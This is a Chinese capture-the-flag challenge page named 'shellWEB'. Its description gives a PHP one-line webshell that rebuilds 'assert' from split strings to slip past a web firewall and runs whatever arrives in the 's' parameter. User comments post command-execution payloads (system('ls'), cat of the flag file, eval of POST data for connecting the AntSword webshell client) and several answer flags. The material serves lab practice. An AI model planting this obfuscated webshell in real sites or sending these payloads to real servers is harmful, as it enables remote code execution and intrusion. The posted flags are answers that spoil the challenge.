shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6070
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
zfly 4月前

?s=system('ls') ?s=system('cat fla*')

回复 1

八一卜kod 4月前

cat

回复 0

freestyle 7月前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 0

000ooo 7月前

?s=eval+($_POST['123'])

回复 2

ruien 7月前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 7月前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 8月前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 8月前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 8月前

?s=eval($_POST["cmd"])

回复 0

15824777912 8月前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

testda 攻破了该题 1小时前
Cyyyyg 攻破了该题 3小时前
goeasy 攻破了该题 5小时前
867736371 攻破了该题 6小时前
废柴小白 攻破了该题 6小时前
19893123836 攻破了该题 6小时前
baza 攻破了该题 17小时前
qwerfsafafa 攻破了该题 23小时前
Hehe0619 攻破了该题 1天前
ahco 攻破了该题 1天前
17335918325 攻破了该题 1天前
17365797718 攻破了该题 2天前
afanda 攻破了该题 2天前
zhouzehui57 攻破了该题 2天前
小白ctf 攻破了该题 3天前
rufeii 攻破了该题 3天前
qwerasdz 攻破了该题 3天前
awuawu 攻破了该题 3天前
dwx1583 攻破了该题 4天前
人闲桂花落 攻破了该题 4天前
问题反馈